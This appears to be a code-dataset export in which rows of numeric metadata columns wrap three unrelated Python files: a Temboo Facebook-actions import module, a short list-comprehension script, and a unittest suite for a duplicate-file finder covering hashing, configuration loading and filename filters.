| 0
| 1
| 0.022727
| false
| 0.074675
| 0.012987
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
99964465ed52f8ea2e2740c85c0247e6766a647e
| 626
|
py
|
Python
|
temboo/core/Library/Facebook/Actions/Video/Watches/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Facebook/Actions/Video/Watches/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Facebook/Actions/Video/Watches/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Facebook.Actions.Video.Watches.CreateWatch import CreateWatch, CreateWatchInputSet, CreateWatchResultSet, CreateWatchChoreographyExecution
from temboo.Library.Facebook.Actions.Video.Watches.DeleteWatch import DeleteWatch, DeleteWatchInputSet, DeleteWatchResultSet, DeleteWatchChoreographyExecution
from temboo.Library.Facebook.Actions.Video.Watches.ReadWatch import ReadWatch, ReadWatchInputSet, ReadWatchResultSet, ReadWatchChoreographyExecution
from temboo.Library.Facebook.Actions.Video.Watches.UpdateWatch import UpdateWatch, UpdateWatchInputSet, UpdateWatchResultSet, UpdateWatchChoreographyExecution
| 125.2
| 158
| 0.897764
| 52
| 626
| 10.807692
| 0.461538
| 0.071174
| 0.120996
| 0.177936
| 0.313167
| 0.313167
| 0.313167
| 0
| 0
| 0
| 0
| 0
| 0.044728
| 626
| 4
| 159
| 156.5
| 0.939799
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9997c390cfe57ff734a3abaa8cf01806cc7291bc
| 101
|
py
|
Python
|
projects/training/n-squared.py
|
Valka7a/python-playground
|
f08d4374f2cec2e8b1afec3753854b1ec10ff480
|
[
"MIT"
] | null | null | null |
projects/training/n-squared.py
|
Valka7a/python-playground
|
f08d4374f2cec2e8b1afec3753854b1ec10ff480
|
[
"MIT"
] | null | null | null |
projects/training/n-squared.py
|
Valka7a/python-playground
|
f08d4374f2cec2e8b1afec3753854b1ec10ff480
|
[
"MIT"
] | null | null | null |
numbers = [1, 2, 3, 4, 5, 6, 7]
print [x ** 2 for x in numbers]
print [x ** 2 for x in range(1, 8)]
| 20.2
| 35
| 0.534653
| 24
| 101
| 2.25
| 0.583333
| 0.222222
| 0.259259
| 0.37037
| 0.481481
| 0.481481
| 0
| 0
| 0
| 0
| 0
| 0.148649
| 0.267327
| 101
| 4
| 36
| 25.25
| 0.581081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
512c7092f437c38c3967b6ebc6d8158d3b8d1372
| 28,476
|
py
|
Python
|
unittests/myunittest.py
|
colinrcooper/filedups
|
7a2271c84df85f45c9f67ab18976bebe347bc256
|
[
"MIT"
] | null | null | null |
unittests/myunittest.py
|
colinrcooper/filedups
|
7a2271c84df85f45c9f67ab18976bebe347bc256
|
[
"MIT"
] | null | null | null |
unittests/myunittest.py
|
colinrcooper/filedups
|
7a2271c84df85f45c9f67ab18976bebe347bc256
|
[
"MIT"
] | null | null | null |
import unittest
from myunittest_settings import *
import os,sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
from find_dups import *
class TestUM(unittest.TestCase):
def setUp(self):
pass
def test_getHashAlgorithms_MD5(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(1), hashAlgorithms)
def test_getHashAlgorithms_SHA1(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = True
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(2), hashAlgorithms)
def test_getHashAlgorithms_SHA224(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = True
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(4), hashAlgorithms)
def test_getHashAlgorithms_SHA256(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = True
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(8), hashAlgorithms)
def test_getHashAlgorithms_SHA384(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = True
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(16), hashAlgorithms)
def test_getHashAlgorithms_SHA512(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = True
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(32), hashAlgorithms)
def test_getHashAlgorithms_All(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = True
hashAlgorithms['useSHA384'] = True
hashAlgorithms['useSHA256'] = True
hashAlgorithms['useSHA224'] = True
hashAlgorithms['useSHA1'] = True
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(63), hashAlgorithms)
def test_getHashAlgorithms_InvalidHigh(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(100), hashAlgorithms)
def test_getHashAlgorithms_InvalidLow(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(-1), hashAlgorithms)
def test_getHashAlgorithms_InvalidType(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms('A'), hashAlgorithms)
def test_hashfile_InvalidFile(self):
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\invalidpath\\invalidfile.txt', DEFAULT_BLOCKSIZE, hashAlgorithms),0)
def test_hashfile_InvalidBlocksize(self):
#Invalid blocksize should default to 65536
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', -1, hashAlgorithms),'b7356a4b8764b54b3e3119dc2394bc7e')
def test_hashfile_MD5(self):
#Check MD5 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'b7356a4b8764b54b3e3119dc2394bc7e')
def test_hashfile_SHA1(self):
#Check SHA1 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=True
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'b38005fd56fa2de86f6458cb73d0d794912e94c0')
def test_hashfile_SHA224(self):
#Check SHA224 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=True
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'4f97a461d81e2aab7e1d7e0b208271317b07a6fe12d0fbbb1919fdc7')
def test_hashfile_SHA256(self):
#Check SHA256 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=True
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'2ec3d40c866e3e2829dbbaade913e97da18eae9a67ae786da7e430a5f1186716')
def test_hashfile_SHA384(self):
#Check SHA384 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=True
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'c8482ee90ab9cd3f50915d466c108cdef06b515954b53630aa2964a120adc883099314a4a6e47fb25daaf49ac1143070')
def test_hashfile_SHA512(self):
#Check SHA512 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=True
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'8531c07a2237475934675ac39ef71e8d49dc1c2c48482eead108910112e233bdfa10f60da906a1759b265e6b0db9cd7eaa5e9ec70175c615cc31c3f22529fa05')
def test_hashfile_AllHashes(self):
#Check Full Concatenation of all hashing algorithms is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=True
hashAlgorithms['useSHA224']=True
hashAlgorithms['useSHA256']=True
hashAlgorithms['useSHA384']=True
hashAlgorithms['useSHA512']=True
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'b7356a4b8764b54b3e3119dc2394bc7eb38005fd56fa2de86f6458cb73d0d794912e94c04f97a461d81e2aab7e1d7e0b208271317b07a6fe12d0fbbb1919fdc72ec3d40c866e3e2829dbbaade913e97da18eae9a67ae786da7e430a5f1186716c8482ee90ab9cd3f50915d466c108cdef06b515954b53630aa2964a120adc883099314a4a6e47fb25daaf49ac11430708531c07a2237475934675ac39ef71e8d49dc1c2c48482eead108910112e233bdfa10f60da906a1759b265e6b0db9cd7eaa5e9ec70175c615cc31c3f22529fa05')
def test_loadDefaultScanOptions(self):
testDict = {}
testDict['FilterMode'] = DEFAULT_FILTERMODE
testDict['FilterFile'] = DEFAULT_FILTERFILE
testDict['SubDirs'] = DEFAULT_SUBDIRS
testDict['MaxFileSize'] = DEFAULT_MAXFILESIZE
testDict['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
testDict['Blocksize'] = DEFAULT_BLOCKSIZE
testDict['CSVOutput'] = DEFAULT_CSV
testDict['HashAlgorithm'] = DEFAULT_HASHALGORITHM
self.assertDictEqual(loadDefaultScanOptions(), testDict)
def test_loadCommandLineScanOptionsValidArgs(self):
cmdArg = {}
scanOptions = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INCLUDE'
cmdArg['filterFile'] = rootdir + '\\include-filters.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'FALSE'
cmdArg['maxFileSize'] = 100000
cmdArg['includeEmptyFiles'] = 'TRUE'
cmdArg['blocksize'] = 131072
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
scanOptions['FilterMode'] = DEFAULT_FILTERMODE
scanOptions['FilterFile'] = DEFAULT_FILTERFILE
scanOptions['SubDirs'] = DEFAULT_SUBDIRS
scanOptions['MaxFileSize'] = DEFAULT_MAXFILESIZE
scanOptions['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
scanOptions['Blocksize'] = DEFAULT_BLOCKSIZE
scanOptions['HashAlgorithm'] = DEFAULT_HASHALGORITHM
scanOptions['CSVOutput'] = DEFAULT_CSV
expectedScanOptions['FilterMode'] = 'INCLUDE'
expectedScanOptions['FilterFile'] = rootdir + '\\include-filters.txt'
expectedScanOptions['SubDirs'] = 'FALSE'
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = 'TRUE'
expectedScanOptions['Blocksize'] = 131072
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(loadCommandLineScanOptions(cmdArg, scanOptions), expectedScanOptions)
def test_loadCommandLineScanOptionsInvalidArgs(self):
cmdArg = {}
scanOptions = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INVALID_MODE'
cmdArg['filterFile'] = rootdir + '\\invalid_filter_path.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'INVALID_OPTION'
cmdArg['maxFileSize'] = -100000
cmdArg['includeEmptyFiles'] = 'INVALID_OPTION'
cmdArg['blocksize'] = 0
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
scanOptions['FilterMode'] = DEFAULT_FILTERMODE
scanOptions['FilterFile'] = DEFAULT_FILTERFILE
scanOptions['SubDirs'] = DEFAULT_SUBDIRS
scanOptions['MaxFileSize'] = DEFAULT_MAXFILESIZE
scanOptions['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
scanOptions['Blocksize'] = DEFAULT_BLOCKSIZE
scanOptions['HashAlgorithm'] = DEFAULT_HASHALGORITHM
scanOptions['CSVOutput'] = DEFAULT_CSV
expectedScanOptions['FilterMode'] = DEFAULT_FILTERMODE
expectedScanOptions['FilterFile'] = DEFAULT_FILTERFILE
expectedScanOptions['SubDirs'] = DEFAULT_SUBDIRS
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
expectedScanOptions['Blocksize'] = DEFAULT_BLOCKSIZE
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(loadCommandLineScanOptions(cmdArg, scanOptions), expectedScanOptions)
def test_getConfigurationsValidArgs(self):
cmdArg = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INCLUDE'
cmdArg['filterFile'] = rootdir + '\\include-filters.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'FALSE'
cmdArg['maxFileSize'] = 100000
cmdArg['includeEmptyFiles'] = 'TRUE'
cmdArg['blocksize'] = 131072
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
expectedScanOptions['FilterMode'] = 'INCLUDE'
expectedScanOptions['FilterFile'] = rootdir + '\\include-filters.txt'
expectedScanOptions['SubDirs'] = 'FALSE'
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = 'TRUE'
expectedScanOptions['Blocksize'] = 131072
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(getConfigurations(cmdArg), expectedScanOptions)
def test_getConfigurationsInvalidArgs(self):
cmdArg = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INVALID_MODE'
cmdArg['filterFile'] = rootdir + '\\invalid_filter_path.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'INVALID_OPTION'
cmdArg['maxFileSize'] = -100000
cmdArg['includeEmptyFiles'] = 'INVALID_OPTION'
cmdArg['blocksize'] = 0
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
expectedScanOptions['FilterMode'] = 'INCLUDE'
expectedScanOptions['FilterFile'] = rootdir + '\\include-filters.txt'
expectedScanOptions['SubDirs'] = 'FALSE'
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = 'TRUE'
expectedScanOptions['Blocksize'] = 131072
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(getConfigurations(cmdArg), expectedScanOptions)
def test_loadConfigFileScanOptionsValidValues(self):
testDict = {}
testDict['FilterMode'] = 'INCLUDE'
testDict['FilterFile'] = rootdir + '\\include-filters.txt'
testDict['SubDirs'] = 'FALSE'
testDict['MaxFileSize'] = 100000
testDict['IncludeEmptyFiles'] = 'TRUE'
testDict['Blocksize'] = 131072
testDict['HashAlgorithm'] = 3
testDict['CSVOutput'] = rootdir + '\\results.csv'
self.assertDictEqual(loadConfigFileScanOptions(rootdir + '\\valid-config.txt'), testDict)
def test_loadConfigFileScanOptionsInValidValues(self):
testDict = {}
testDict['FilterMode'] = DEFAULT_FILTERMODE
testDict['FilterFile'] = DEFAULT_FILTERFILE
testDict['SubDirs'] = DEFAULT_SUBDIRS
testDict['MaxFileSize'] = DEFAULT_MAXFILESIZE
testDict['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
testDict['Blocksize'] = DEFAULT_BLOCKSIZE
testDict['HashAlgorithm'] = DEFAULT_HASHALGORITHM
testDict['CSVOutput'] = DEFAULT_CSV
self.assertDictEqual(loadConfigFileScanOptions(rootdir + '\\bad-config.txt'), testDict)
def test_loadConfigFileScanOptionsConfigNotFound(self):
testDict = {}
testDict['FilterMode'] = DEFAULT_FILTERMODE
testDict['FilterFile'] = DEFAULT_FILTERFILE
testDict['SubDirs'] = DEFAULT_SUBDIRS
testDict['MaxFileSize'] = DEFAULT_MAXFILESIZE
testDict['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
testDict['Blocksize'] = DEFAULT_BLOCKSIZE
testDict['HashAlgorithm'] = DEFAULT_HASHALGORITHM
testDict['CSVOutput'] = DEFAULT_CSV
self.assertDictEqual(loadConfigFileScanOptions(rootdir + '\\invalidpath\\invalid-config-path.txt'), testDict)
def test_findDup_NonZero_NoSubDirs(self):
#Only non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['SubDirs'] = 'FALSE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_NonZero_SubDirs(self):
#Only non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt', rootdir + '\\testfiles\\childdir\\childdir-bigfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['SubDirs'] = 'FALSE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt', rootdir + '\\testfiles\\childdir\\childdir-bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt', rootdir + '\\testfiles\\childdir\\childdir-emptyfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyLog_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .log files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
scanOptions['SubDirs'] = 'FALSE'
filters = ['*.log']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyLog_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .log files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
filters = ['*.log']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyTxt_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .txt files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
scanOptions['SubDirs'] = 'FALSE'
filters = ['*.txt']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt']]
self.assertListEqual(results, expectedresults)
def test_findDup_IncludeOnlyTxt_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only .txt files
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['FilterMode'] = 'INCLUDE'
filters = ['*.txt']
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\bigfile1 - Copy.txt', rootdir + '\\testfiles\\bigfile1.txt', rootdir + '\\testfiles\\childdir\\childdir-bigfile1.txt'],
[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt', rootdir + '\\testfiles\\childdir\\childdir-emptyfile1.txt']]
self.assertListEqual(results, expectedresults)
def test_findDup_MaxSize30000_NoSubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only files less than 30,000 bytes
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['MaxFileSize'] = 30000
scanOptions['SubDirs'] = 'FALSE'
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log']]
self.assertListEqual(results, expectedresults)
def test_findDup_MaxSize30000_SubDirs(self):
#Zero-sized and non-zero sized files of any size should be found, but only files less than 30,000 bytes
dups = {}
results = []
scanOptions = loadDefaultScanOptions()
scanOptions['IncludeEmptyFiles'] = 'TRUE'
scanOptions['MaxFileSize'] = 30000
filters = []
dups = findDup(rootdir + '\\testfiles', filters, scanOptions)
results = list(filter(lambda x: len(x) > 1, dups.values()))
expectedresults = [[rootdir + '\\testfiles\\emptyfile1.txt', rootdir + '\\testfiles\\emptyfile2.txt', rootdir + '\\testfiles\\childdir\\childdir-emptyfile1.txt'],
[rootdir + '\\testfiles\\file1 - Copy.log', rootdir + '\\testfiles\\file1.log', rootdir + '\\testfiles\\childdir\\childdir-file1.log']]
self.assertListEqual(results, expectedresults)
def test_loadFiltersValidPath(self):
results = loadFilters(rootdir + '\\include-filters.txt')
expectedresults = ['*.log']
self.assertListEqual(results, expectedresults)
def test_loadFiltersInvalidPath(self):
results = loadFilters('c:\invalid path/**$$')
expectedresults = []
self.assertListEqual(results, expectedresults)
def test_getFiltersNoFiltersBlankNone(self):
expected_results = []
results = getFilters('', None)
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersBlankBlank(self):
expected_results = []
results = getFilters('', '')
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersNoneBlank(self):
expected_results = []
results = getFilters(None, '')
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersNoneNone(self):
expected_results = []
results = getFilters(None, None)
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersNoneCmd(self):
expected_results = ['*.csv','*.txt','*.xlsx']
results = getFilters(None, ['*.csv', '*.txt', '*.xlsx'])
self.assertListEqual(results, expected_results)
def test_getFiltersNoFiltersFileNone(self):
expected_results = ['*.log']
results = getFilters(rootdir + '\\include-filters.txt', None)
self.assertListEqual(results, expected_results)
def test_shortenNameNone30(self):
results = shortenName(None, 30)
expected_results = ''
self.assertEqual(results, expected_results)
def test_shortenNameShortStringNone(self):
results = shortenName('abc', None)
expected_results = 'abc'
self.assertEqual(results, expected_results)
def test_shortenNameShortStringBigLength(self):
results = shortenName('abc', 50)
expected_results = 'abc'
self.assertEqual(results, expected_results)
def test_shortenNameEvenString5(self):
results = shortenName('abcdef', 5)
expected_results = 'a...f'
self.assertEqual(results, expected_results)
def test_shortenNameOddString5(self):
results = shortenName('abcdefg', 5)
expected_results = 'a...g'
self.assertEqual(results, expected_results)
def test_padSpaces(self):
results = padSpaces('abc', 5)
expected_results = 'abc '
self.assertEqual(results, expected_results)
